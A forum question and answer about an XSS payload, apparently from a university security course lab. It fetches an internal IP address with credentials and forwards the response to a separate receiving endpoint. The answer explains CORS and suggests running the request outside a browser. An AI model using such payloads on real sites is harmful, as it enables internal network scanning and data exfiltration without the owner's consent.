How can I fetch an http plain text resource from an HTTPS server

Question

I'm am basically attempting portscanning through xss and I am trying to exploit the same origin policy of my target server. I think I set the appropriate headers. I need to basically retrieve the response from a web service on the target server in plain text and forward it to my message receipt end point. I think I set the appropriate headers to enable cors but I still get the mixed content block and no object forwarded to that endpoint.

let headers = new Headers();

headers.append('Content-Type', 'application/json');
headers.append('Accept', 'application/json');
headers.append('Origin','https://cs6262.gtisc.gatech.edu/');

fetch('http://172.16.238.10:80', {
    mode: 'cors',
    credentials: 'include',
    method: 'POST',
    headers: headers
})
.then(response => response.json())
    .then(function (data) {
      fetch('http://cs6262.gtisc.gatech.edu/receive/ndike6/572', { method: 'POST', body:  data})
    });

If I am misunderstanding header usage I'd greatly appreciate the clarity

Answer 1

Firstly, you have to notice that Access-Control headers should be set on the side which handles the request (server side), not on the side which sends the request.

I assume that you don't have access to server and can't set those headers by yourself.

Secondly, CORS policy is implemented in WEB Browsers, so if you try to execute this code in non browser environment (e.g. NodeJS) you won't have problems. Also Notice that in NodeJS you don't have fetch api (it's web browser's feature), but you have libraries for sending http request from backend like axios or recently release node-fetch library that corresponds to fetch api in browsers.